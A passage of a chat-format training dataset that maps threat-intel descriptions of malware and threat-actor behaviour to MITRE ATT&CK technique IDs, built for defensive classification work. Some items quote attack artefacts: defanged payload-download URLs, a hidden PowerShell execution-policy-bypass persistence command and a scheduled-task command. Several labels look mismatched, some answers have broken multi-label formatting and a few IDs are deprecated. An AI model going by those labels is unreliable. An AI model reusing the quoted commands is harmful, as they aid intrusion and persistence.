- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "InvisiMole can collect information about installed software used by specific users, software executed on user login, and software executed by each system."
- },
- {
- "role": "assistant",
- "content": "T1518 - Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Axiom has acquired dynamic DNS services for use in the targeting of intended victims."
- },
- {
- "role": "assistant",
- "content": "T1583.002 - DNS Server"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly has compromised legitimate websites to host C2 and malware modules."
- },
- {
- "role": "assistant",
- "content": "T1584.004 - Server"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CostaBricks can implement a custom-built virtual machine mechanism to obfuscate its code."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly 2.0 used a batch script to gather folder and file names from victim hosts."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has used the Windows API \"ObtainUserAgentString\" to obtain the User-Agent from a compromised host to connect to a C2 server. Lazarus Group has also used various, often lesser known, functions to perform various types of Discovery and Process Injection."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The first email displays the following decoy document to the infected user and download the following payload:hxxp://discgolfglow[.]com:/wp-content/plugins/maintenance/images/worker.jpgThe second email displays the following decoy document to the infected user and downloads the following payload:hxxp://acddesigns[.]com[.]au/clients/ACPRCM/kingstone.jpgIn both cases, the downloaded payload is the ROKRAT malware.The first tasks of this variant of ROKRAT is to check the operating system version"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer', 'T1497 - Virtualization/Sandbox Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 5: Registry Activity The script then determines the version of Powershell that is being used on the infected system. If the switch associated with the execution of Stage 3 was passed to the 'pre_logic' function at the beginning of this stage, the Stage 3 payload will then be executed immediately"
- },
- {
- "role": "assistant",
- "content": "T1564.004 - Hide Artifacts: NTFS File Attributes"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat Group-3390 actors look for and use VPN profiles during an operation to access the network using external VPN services. Threat Group-3390 has also obtained OWA account credentials during intrusions that it subsequently used to attempt to regain access when evicted from a victim network."
- },
- {
- "role": "assistant",
- "content": "T1133 - External Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The ‘vac.dll’ DLL file is signed with a valid, legitimate digital signature, although the file has been tampered with. At first glance, the fact that its digital signature is valid would suggest the file has not been manipulated after being digitally signed"
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Proton gathers credentials for Google Chrome."
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POWRUNER is written in PowerShell."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 has used newly-created Blogspot pages for credential harvesting operations."
- },
- {
- "role": "assistant",
- "content": "T1583.006 - Web Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Anchor can self delete its dropper after the malware is successfully deployed."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UPPERCUT has the capability to gather the system’s hostname and OS version."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ShimRat has used Windows API functions to install the service and shim."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Because TA505 is such a significant part of the email threat landscape, this blog provides a retrospective on the shifting malware, payloads, and campaigns associated with this actor. We examine their use malware such as Jaff, Bart, and Rockloader that appear to be exclusive to this group as well as more widely distributed malware like Dridex and Pony. Where possible, we detail the affiliate models with which they are involved and outline the current state of TA505 campaigns"
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "On June 28, 2020, our Threat Fusion team identified a new file being downloaded by the Aisino Intelligent Tax product. Rather, this new sample’s sole mission is to delete GoldenSpy and remove any trace it existed. Including the deletion of registry entries, all files and folders (including the GoldenSpy log file), and finally, the uninstaller deletes itself with the following command: cmd.exe /c del /q C:\\Users\\admin\\AppData\\Local\\Temp\\AWX.exe. Note the “/c” which will terminate the Windows Command-line interface after the operation is completed and “/d” which will delete without asking permission or giving any notification"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "2) Download the OpenSSL library. Instead of saving the downloaded file, QakBot measures the download speed and deletes the received file"
- },
- {
- "role": "assistant",
- "content": "T1016.001 - System Network Configuration Discovery: Internet Connection Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After execution, Ragnar Locker Ransomware encrypts the files and adds the extension “.ragnar” and an 8 digit number"
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used Remote Desktop Protocol to conduct lateral movement."
- },
- {
- "role": "assistant",
- "content": "T1021.001 - Remote Services: Remote Desktop Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sidewinder has configured tools to automatically send collected files to attacker controlled servers."
- },
- {
- "role": "assistant",
- "content": "T1020 - Automated Exfiltration"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has used modified versions of open source PHP web shells to maintain access, often adding \"Dinosaur\" references within the code."
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "contains a keylogger module that collects keystrokes and the titles of foreground windows."
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "obtains a list of running processes through WMI querying and the ps command."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Darkhotel malware has employed just-in-time decryption of strings to evade sandbox detection."
- },
- {
- "role": "assistant",
- "content": "T1497 - Virtualization/Sandbox Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gelsemium has compromised software supply chains to gain access to victims."
- },
- {
- "role": "assistant",
- "content": "T1195.002 - Compromise Software Supply Chain"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "drops commands for a second victim onto a removable media drive inserted into the first victim, and commands are executed when the drive is inserted into the second victim."
- },
- {
- "role": "assistant",
- "content": "T1092 - Communication Through Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tropic Trooper has encrypted traffic with the C2 to prevent network detection."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZLib has the ability to discover and manipulate Windows services."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team has enumerated files on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "However, the OwaAuth web shell password contains the victim organization's name"
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "EVILNUM can make modifications to the Regsitry for persistence."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As the Top Twenty shows, DNSChanger is also widespread. There is actually a connection between Zlob and DNSChanger – we believe they were created by the same gang. Although DNSChanger underwent many changes during its lifespan, basically what it does is simply change the DNS servers from the user’s computer to a set of two specific IP addresses. The IP addresses are selected from a huge pool and the variation comes in distributing thousand of different DNSChanger binaries, each one setting the DNS servers to distinct IP addresses. While changing the DNS servers may not be regarded as something seriously malicious, an attacker who achieves this can actually do a lot of harm – for instance, redirecting websites such as Amazon.com or Bank Of America to phishing installations almost entirely without any sign of warning to the user. To complicate removal, the most recent DNSChangers include rootkit components and even download additional malware."
- },
- {
- "role": "assistant",
- "content": "T1014 - Rootkit"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 has used CVE-2015-1701 to access the SYSTEM token and copy it into the current process as part of privilege escalation."
- },
- {
- "role": "assistant",
- "content": "T1134.001 - Access Token Manipulation: Token Impersonation/Theft"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "admin@338 has exploited client software vulnerabilities for execution, such as Microsoft Word CVE-2012-0158."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "gathers the victim username."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Uses tools such as PDQ Inventory scanner, Advanced Port Scanner and netscan (which also scanned for the ProxyShell vulnerability)."
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QuasarRAT can obtain passwords from common web browsers."
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Frankenstein, the threat actors established persistence through a scheduled task using the command: `/Create /F /SC DAILY /ST 09:00 /TN WinUpdate /TR`, named \"WinUpdate\""
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We recently observed an instance where the FlawedAmmyy downloader was not digitally signed (FlawedAmmyy RAT payload is still signed, however). It could be a blip — perhaps a one-off — but it's still notable"
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The downloaded file named install_flash_player.exe needs to be manually launched by the victim. To operate correctly, it needs elevated administrative privileges which it attempts to obtain using the standard UAC prompt. If started, it will save the malicious DLL as C:Windowsinfpub.dat and launch it using rundll32"
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CORALDECK has exfiltrated data in HTTP POST headers."
- },
- {
- "role": "assistant",
- "content": "T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rancor has used \"msiexec\" to download and execute malicious installer files over HTTP."
- },
- {
- "role": "assistant",
- "content": "T1218.007 - Signed Binary Proxy Execution: Msiexec"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FYAnti can search the \"C:\\Windows\\Microsoft.NET\\\" directory for files of a specified size."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Aria-body has the ability to identify the titles of running windows on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1010 - Application Window Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stealth Falcon malware gathers system information via WMI, including the system directory, build number, serial number, version, manufacturer, model, and total physical memory."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Grandoreiro’s DGA uses two strings (prefix and suffix) hardcoded in the binary and the local date as inputs. Note that based on the DGA, a different website is required for each day. We have observed some variants also using a custom base64 alphabet"
- },
- {
- "role": "assistant",
- "content": "T1568.002 - Domain Generation Algorithms"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gamaredon Group has used tools to enumerate processes on target hosts including Process Explorer."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the capability to execute ver, systeminfo, and gpresult commands."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 used \"AUDITPOL\" to prevent the collection of audit logs."
- },
- {
- "role": "assistant",
- "content": "T1562.002 - Impair Defenses: Disable Windows Event Logging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "To install the payload, the script will create a file %APPDATA%\\OneDrive.bat and save the following string to it: powershell.exe -WindowStyle Hidden -exec bypass -File “%APPDATA%\\OneDrive.ps1” The script then writes a modified copy of itself to %APPDATA%\\OneDrive.ps1, with the code that performs this installation omitted"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading', 'T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used DLL side-loading."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "added Registry Run keys to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is usually configured with primary and backup domains for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "They routinely used standard tools that would mimic legitimate administrator activities. They relied on encrypted SSH-based tunnels to transfer tools and for remote command/program execution. They routinely deleted dropped attack tools, execution logs, files staged for exfiltration, and other files after they were finished with them. They renamed their tools' filenames in the staging folder so that it would not be possible to identify the malware's purpose, even after it was deleted from the disk through the residual artifacts (e.g. ShimCache entries or WMI Recently Used Apps). - They used timestomping to modify the $STANDARD_INFORMATION attribute of the attack tools"
- },
- {
- "role": "assistant",
- "content": "T1021.004 - Remote Services: SSH"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the capability to identify remote hosts on connected networks."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BlackTech has used spearphishing e-mails with malicious password-protected archived files (ZIP or RAR) to deliver malware."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "will use an 8-byte XOR key derived from the string HYF54&%9&jkMCXuiS instead if the DES decoding fails."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This change is because Group 123 did not target South Korea during this campaign and Microsoft Office is standard in the rest of the world.Infection VectorsThe attackers exploited CVE-2017-0199 in order to download and execute a malicious HTA document inside of Microsoft Office"
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BoomBox can establish persistence by writing the Registry value \"MicroNativeCacheSvc\" to \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses ports 80, 443, and 8080 for C2."
- },
- {
- "role": "assistant",
- "content": "T1043 - Commonly Used Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can execute a payload on a remote host with PowerShell. This technique does write any data to disk."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It searches the active process list for the systemd process"
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can establish persistence by adding Registry Run keys."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DarkWatchman can collect the OS version, system architecture, uptime, and computer name."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bumblebee can encrypt C2 requests and responses with RC4"
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hildegard was executed through the kubelet API run command and by executing commands on running containers."
- },
- {
- "role": "assistant",
- "content": "T1609 - Kubernetes Exec Into Container"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FoggyWeb can remotely exfiltrate sensitive information from a compromised AD FS server."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly 2.0 used batch scripts to enumerate network information, including information about trusts, zones, and the domain."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SideCopy has used a malicious loader DLL file to execute the `credwiz.exe` process and side-load the malicious payload `Duser.dll`."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 6 Hardcoded Google Drive URL used in RogueRobin sample When the modification_time for the first file changes, the Trojan downloads the contents from the first file uploaded to the Google Drive"
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
